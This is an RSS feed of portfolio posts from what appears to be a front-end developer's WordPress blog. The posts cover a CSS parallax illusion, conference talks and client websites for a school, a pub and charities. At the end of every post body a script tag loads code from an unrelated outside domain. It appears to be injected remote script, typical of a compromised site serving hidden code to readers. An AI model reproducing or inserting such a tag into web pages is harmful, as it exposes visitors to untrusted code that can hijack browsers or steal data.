<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Maban &#187; Portfolio</title>
	<atom:link href="http://maban.co.uk/category/portfolio/feed" rel="self" type="application/rss+xml" />
	<link>http://maban.co.uk</link>
	<description>Anna Debenham - Front End Developer</description>
	<lastBuildDate>Tue, 20 Jul 2010 20:58:44 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Parallax Illusion</title>
		<link></link>
		<comments>http://maban.co.uk/507#comments</comments>
		<pubDate>Mon, 12 Apr 2010 11:38:54 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[sandbox]]></category>
		<category><![CDATA[scanimation]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=507</guid>
		<description><![CDATA[
On Saturday, inspired by Paul Annett&#8217;s Channel 4 logo, I decided to build a parallax illusion in the browser.
Here&#8217;s the end result: http://maban.co.uk/sandbox/parallax-illusion/

How it works
To build this you only need 2 images. One is the stripes (mine is a 14&#215;8 gif where 6px are transparent, and 8 are black) and the main image which is [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-509" title="Parallax Illusion image" src="http://maban.co.uk/wp-content/uploads/2010/04/IMG_1001-300x225.jpg" alt="" width="240" height="180" /></p>
<p>On Saturday, inspired by <a href="http://nicepaul.com/">Paul Annett&#8217;s</a> <a href="http://4.nicepaul.com/">Channel 4 logo</a>, I decided to build a parallax illusion in the browser.</p>
<p>Here&#8217;s the end result: <a href="http://maban.co.uk/sandbox/parallax-illusion/">http://maban.co.uk/sandbox/parallax-illusion/</a></p>
<p><span id="more-507"></span></p>
<h3>How it works</h3>
<p>To build this you only need 2 images. One is the stripes (mine is a 14&#215;8 gif where 6px are transparent, and 8 are black) and the main image which is actually 2 images in 1 layered on top of each other.</p>
<p>The main image is a bird in 2 states &#8211; 1 with its wings up, 1 down. You can have more states, but I wanted to keep this very simple.</p>
<p>The stripes are a transparent, repeating background which appear over the image.</p>
<p>The stripes of the image that are visible need to be the same width as the gap between the stripes that go on top of it. So that the wings on the down state aren&#8217;t visible while it&#8217;s on the up state, you&#8217;ll need to position the blank stripes slightly differently on the down state, in this case 6px to the right of the ones on the up state. Then simply layer the two images on top of each other and save them as one image.</p>
<h4>The HTML:</h4>
<p><code>&lt;div class="image"&gt;<br />
&lt;div class="strips"&gt;&lt;/div&gt;<br />
&lt;/div&gt;</code></p>
<h4>The CSS:</h4>
<p><code>.strips {<br />
background-image:url("strips.gif");<br />
background-repeat:repeat;<br />
background-position:center center;<br />
height:100%;<br />
width:100%;<br />
}<br />
.image {<br />
background-image:url("background.gif");<br />
position:fixed;<br />
background-repeat:repeat-x;<br />
height:100%;<br />
width:100%;<br />
}</code></p>
<p>All this does is position the stripes over the image, and make both images the full height and width of the screen since there&#8217;s no content in them. The image stays in the same place while the stripes move with the width of the window because they are centred.</p>
<h3>More parallax illusions</h3>
<p>Paul Annett sent me a couple of links to parallax illusions he&#8217;d seen that other people have made: <a href="http://demo.marcofolio.net/a_parallax_illusion_with_css/">one of a horse running</a>, and <a href="http://demo.marcofolio.net/your_own_css_parallax_illusion/">one of a 3D object</a>.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/507/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>CSS Nuggets</title>
		<link></link>
		<comments>http://maban.co.uk/308#comments</comments>
		<pubDate>Mon, 26 Oct 2009 11:23:28 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Conferences]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[barcamp]]></category>
		<category><![CDATA[bcl7]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[slideshow]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=308</guid>
		<description><![CDATA[At Barcamp London 7, I gave a presentation on some CSS tricks I learnt while building Scrunchup.  Here it is:
CSS Nuggets
View more presentations from Anna Debenham.

I&#8217;m planning on doing a full write-up for an upcoming issue of Scrunchup.
]]></description>
			<content:encoded><![CDATA[<p>At Barcamp London 7, I gave a presentation on some CSS tricks I learnt while building Scrunchup. <span id="more-308"></span> Here it is:</p>
<div style="width:425px;text-align:left" id="__ss_2347968"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/maban/css-nuggets" title="CSS Nuggets">CSS Nuggets</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=bcl7-091026061858-phpapp01&#038;stripped_title=css-nuggets" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=bcl7-091026061858-phpapp01&#038;stripped_title=css-nuggets" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object>
<div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/maban">Anna Debenham</a>.</div>
</div>
<p>I&#8217;m planning on doing a full write-up for an upcoming issue of Scrunchup.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/308/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>A Teenager&#8217;s Guide to Effective Freelancing</title>
		<link></link>
		<comments>http://maban.co.uk/228#comments</comments>
		<pubDate>Sun, 09 Aug 2009 00:01:58 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Conferences]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[speaking]]></category>
		<category><![CDATA[talk]]></category>
		<category><![CDATA[tomorrow's web]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=228</guid>
		<description><![CDATA[Yesterday, I gave a talk at a web conference called Tomorrow&#8217;s Web.  I gave a summary of some of the conference talks here.
The reason I did this talk is because I am concerned that young web designers and developers are jumping into freelancing without much thought, and then discovering how much of a minefield [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday, I gave a talk at a web conference called <a href="http://tomorrowswebconf.com/">Tomorrow&#8217;s Web</a>.  I gave a <a href="http://maban.co.uk/index.php/2009/08/08/tomorrows-web/">summary of some of the conference talks here</a>.</p>
<p>The reason I did this talk is because I am concerned that young web designers and developers are jumping into freelancing without much thought, and then discovering how much of a minefield it can be.  So I decided to cover things like how to set up, what sort of problems young freelancers come across, and what I&#8217;ve learned from the mistakes I&#8217;ve made.  I hope you find it useful.</p>
<p><span id="more-228"></span></p>
<p>Big thanks to <a href="http://grabaperch.com/">Perch</a> and <a href="http://www.realmacsoftware.com/littlesnapper/">Littlesnapper</a> who provided me with prizes to give out to people who stayed awake during the talk.</p>
<p>Here&#8217;s an unedited video of the first set of talks. Mine is 01:06:45 in.  I&#8217;m hoping an edited version will be available soon.<br />
<embed flashvars="loc=%2F&amp;autoplay=false&amp;vid=1947857" width="480" height="386" allowfullscreen="true" allowscriptaccess="always" src="http://www.ustream.tv/flash/video/1947857" type="application/x-shockwave-flash" /></p>
<p>Here are my slides.  If you want to read the notes that go with the slides, click through to the slideshare site.</p>
<div id="__ss_1831658" style="width: 425px; text-align: left;"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" title="A Teenager's Guide to Effective Freelancing" href="http://www.slideshare.net/maban/a-teenagers-guide-to-effective-freelancing-1831658">A Teenager&#8217;s Guide to Effective Freelancing</a><object style="margin:0px" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=freelancing-090808181744-phpapp01&amp;rel=0&amp;stripped_title=a-teenagers-guide-to-effective-freelancing-1831658" /><param name="allowfullscreen" value="true" /><embed style="margin:0px" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=freelancing-090808181744-phpapp01&amp;rel=0&amp;stripped_title=a-teenagers-guide-to-effective-freelancing-1831658" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<div style="font-size: 11px; font-family: tahoma,arial; height: 26px; padding-top: 2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/maban">Anna Debenham</a>.</div>
</div>
<p>Here are two YouTube videos that were filmed by <a href="http://techettes.com/">Meaghan</a> of the talk.</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube-nocookie.com/v/tY4qSD2vzp8&#038;hl=en&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube-nocookie.com/v/tY4qSD2vzp8&#038;hl=en&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br />
<object width="425" height="344"><param name="movie" value="http://www.youtube-nocookie.com/v/dUEF-4CYb4U&#038;hl=en&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube-nocookie.com/v/dUEF-4CYb4U&#038;hl=en&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/228/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Chessbrook Education Centre</title>
		<link></link>
		<comments>http://maban.co.uk/209#comments</comments>
		<pubDate>Sat, 18 Jul 2009 22:30:27 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[project]]></category>
		<category><![CDATA[school]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=209</guid>
		<description><![CDATA[Chessbrook is the second school I have worked with.  It was a really great project to work on because it was quite challenging.  The school is an education centre for students who have not been able to cope in mainstream education.
I really like what Chessbrook are doing, and they were perfect clients to work with.  [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2009/08/LittleSnapper-2.jpg"><img class="alignleft size-thumbnail wp-image-210" title="Chessbrook Website" src="http://maban.co.uk/wp-content/uploads/2009/08/LittleSnapper-2-150x150.jpg" alt="Chessbrook Website" width="150" height="150" /></a>Chessbrook is the second school I have worked with.  It was a really great project to work on because it was quite challenging.  The school is an education centre for students who have not been able to cope in mainstream education.</p>
<p>I really like what Chessbrook are doing, and they were perfect clients to work with.  At the end of the project, I did usability testing with the students to get their feedback on the website.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/209/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>dConstruct 2009 (Clearleft)</title>
		<link></link>
		<comments>http://maban.co.uk/200#comments</comments>
		<pubDate>Sat, 06 Jun 2009 15:15:13 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Case Studies]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[dconstruct]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[project]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=200</guid>
		<description><![CDATA[I worked on the HTML and CSS for Clearleft&#8217;s dConstruct 2009 website, using microformats to mark up the schedules and locations.

The navigation was a bit of a challenge.  The selected state was quite fiddly to develop because I wanted the text to resize without dropping out of the green strip.  Here&#8217;s what I did&#8230;

Above [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2009/08/dConstruct-2009.jpg"><img class="alignleft size-thumbnail wp-image-201" title="dConstruct 2009" src="http://maban.co.uk/wp-content/uploads/2009/08/dConstruct-2009-150x150.jpg" alt="dConstruct 2009" width="150" height="150" /></a>I worked on the HTML and CSS for Clearleft&#8217;s dConstruct 2009 website, using microformats to mark up the schedules and locations.</p>
<p><span id="more-200"></span></p>
<p>The navigation was a bit of a challenge.  The selected state was quite fiddly to develop because I wanted the text to resize without dropping out of the green strip.  Here&#8217;s what I did&#8230;</p>
<p><img class="alignnone size-full wp-image-202" title="Home Link Normal Size" src="http://maban.co.uk/wp-content/uploads/2009/08/Firefox-2.jpg" alt="Home Link Normal Size" width="152" height="123" /></p>
<p>Above is the text at normal size, and below is the text 5x bigger than normal.</p>
<p><img class="alignnone size-full wp-image-203" title="Home Link Large Text" src="http://maban.co.uk/wp-content/uploads/2009/08/Firefox-3.jpg" alt="Home Link Large Text" width="220" height="123" /></p>
<p>I extended the white background at the top of the image so that it would cover the green strip when the text is resized and not look too out of place.  The selected state is actually two images.</p>
<p><img class="size-full wp-image-204 alignleft" title="Link background right" src="http://maban.co.uk/wp-content/uploads/2009/08/LittleSnapper.jpg" alt="Link background right" width="233" height="92" />This is what the background image for the right half of the link looks like.  It&#8217;s long to allow for long links.  When the link is small, it looks shorter.</p>
<p>While I was working on the site, <a href="http://natbat.net">Nat</a> showed me a really good way to make the site more maintainable and use less code.  The site is made up of strips of content &#8211; the header, main content, sponsors and footer, and these all have very similar properties (things like they all have a width of 80% and the same amount of margins).  Rather than repeating the CSS for each class, we added a class within each strip called &#8220;section&#8221;.  So if we needed to make a change to the layout and instead make the width 70%, we would only need to change this in one place.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/200/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox Addons Site (Clearleft)</title>
		<link></link>
		<comments>http://maban.co.uk/167#comments</comments>
		<pubDate>Tue, 05 May 2009 14:09:39 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[clearleft]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[mozilla]]></category>
		<category><![CDATA[project]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=167</guid>
		<description><![CDATA[
While interning at Clearleft, I helped work on the front end code for the Mozilla Addons site, pair programming with Natalie Downe.

]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2009/08/Add-ons-for-Firefox.jpg"><img src="http://maban.co.uk/wp-content/uploads/2009/08/Add-ons-for-Firefox-150x150.jpg" alt="Add-ons for Firefox" title="Add-ons for Firefox" width="150" height="150" class="alignleft size-thumbnail wp-image-168" /></a></p>
<p>While interning at Clearleft, I helped work on the front end code for the Mozilla Addons site, pair programming with <a href="http://natbat.net/">Natalie Downe</a>.</p>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/167/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WWF Site (Clearleft)</title>
		<link></link>
		<comments>http://maban.co.uk/173#comments</comments>
		<pubDate>Sun, 05 Apr 2009 14:28:00 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[clearleft]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[project]]></category>
		<category><![CDATA[wwf]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=173</guid>
		<description><![CDATA[
This was the first project I worked on while interning at Clearleft.  I pair programmed with Natalie Downe on the HTML and CSS.

]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2009/08/WWF-International-Local-to-Global-Environmental-Conservation.jpg"><img src="http://maban.co.uk/wp-content/uploads/2009/08/WWF-International-Local-to-Global-Environmental-Conservation-150x150.jpg" alt="WWF International - Local to Global Environmental Conservation" title="WWF International - Local to Global Environmental Conservation" width="150" height="150" class="alignleft size-thumbnail wp-image-172" /></a></p>
<p>This was the first project I worked on while interning at Clearleft.  I pair programmed with <a href="http://natbat.net/">Natalie Downe</a> on the HTML and CSS.</p>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/173/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Training U</title>
		<link></link>
		<comments>http://maban.co.uk/213#comments</comments>
		<pubDate>Tue, 20 Jan 2009 22:39:01 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[branding]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[jquery]]></category>
		<category><![CDATA[print design]]></category>
		<category><![CDATA[project]]></category>
		<category><![CDATA[trainingu]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=213</guid>
		<description><![CDATA[While attending a Business Link course on starting up, I met Nicola Dolan, a lady who was setting up her own company that offered IT Training courses.  I worked with Nicola to design the branding for her company, and also designed and developed her website.  I had fun building a nice jQuery accordion menu for [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2009/08/Firefox-4.jpg"><img class="alignleft size-thumbnail wp-image-214" title="Training U" src="http://maban.co.uk/wp-content/uploads/2009/08/Firefox-4-150x150.jpg" alt="Training U" width="150" height="150" /></a>While attending a Business Link course on starting up, I met Nicola Dolan, a lady who was setting up her own company that offered IT Training courses.  I worked with Nicola to design the branding for her company, and also designed and developed her website.  I had fun building a nice jQuery accordion menu for the course outlines page.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/213/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Portland Arms Pub</title>
		<link></link>
		<comments>http://maban.co.uk/149#comments</comments>
		<pubDate>Wed, 05 Nov 2008 13:23:51 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[project]]></category>
		<category><![CDATA[pub]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=149</guid>
		<description><![CDATA[
The Portland Arms pub website was commisioned by the landlady to provide information to locals about events at the pub, as well as an up-to-date seasonal menu.  The pub dog, Buster, updates his online blog (http://www.theportlandarmspub.co.uk/blog/bustersblog.html) with his perspective of life at the Portland Arms, with photos of the people, and other dogs, he [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2008/11/The-Portland-Arms-Welcome-2.jpg"><img class="size-thumbnail wp-image-153 alignleft" title="The Portland Arms Pub Website Screenshot" src="http://maban.co.uk/wp-content/uploads/2008/11/The-Portland-Arms-Welcome-2-150x150.jpg" alt="The Portland Arms Pub Website Screenshot" width="150" height="150" /></a></p>
<p>The Portland Arms pub website was commisioned by the landlady to provide information to locals about events at the pub, as well as an up-to-date seasonal menu.  The pub dog, Buster, updates his online blog (http://www.theportlandarmspub.co.uk/blog/bustersblog.html) with his perspective of life at the Portland Arms, with photos of the people, and other dogs, he meets.</p>
<p>The landlady takes photos using her iPhone of the food served in the kitchen and uploads them to the website via Flickr.  She also takes photos at special events, and these are automatically posted to a slideshow on the site (http://www.theportlandarmspub.co.uk/gallery.php).  Many locals didn&#8217;t know where the pub was, so I added a Google map which shows users where the pub is, and they can plan their route to the pub using this feature.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/149/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>British Band Instrument Company</title>
		<link></link>
		<comments>http://maban.co.uk/128#comments</comments>
		<pubDate>Fri, 01 Aug 2008 10:42:48 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Portfolio]]></category>
		<category><![CDATA[bbico]]></category>
		<category><![CDATA[front end]]></category>
		<category><![CDATA[instruments]]></category>
		<category><![CDATA[international]]></category>
		<category><![CDATA[project]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=128</guid>
		<description><![CDATA[
The British Band Instrument Company website was launched as an online brochure of instruments being sold to across the world, specifically in the Middle East.  I added a translation feature, and made all the text editable so it could be translated into different languages.  After some research, I placed the navigation on the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://maban.co.uk/wp-content/uploads/2008/08/British-Band-Instrument-Company.jpg"><img class="size-thumbnail wp-image-159 alignleft" title="British Band Instrument Company" src="http://maban.co.uk/wp-content/uploads/2008/08/British-Band-Instrument-Company-150x150.jpg" alt="British Band Instrument Company" width="150" height="150" /></a></p>
<p>The British Band Instrument Company website was launched as an online brochure of instruments being sold to across the world, specifically in the Middle East.  I added a translation feature, and made all the text editable so it could be translated into different languages.  After some research, I placed the navigation on the right rather than the left because people in the Middle East read from right to left.  I also added images onto the buttons (using the &#8220;<a href="http://www.alistapart.com/articles/slidingdoors2/" target="_blank">sliding doors</a>&#8221; technique) so that the user could visually distinguish the instruments.  I used the sliding doors technique to speed up load time and ensured the site was usable on IE6 at a screen resolution of 800&#215;600, as I anticipated that many users in this part of the world would not have fast Internet speeds or high-end technology.</p>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/128/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
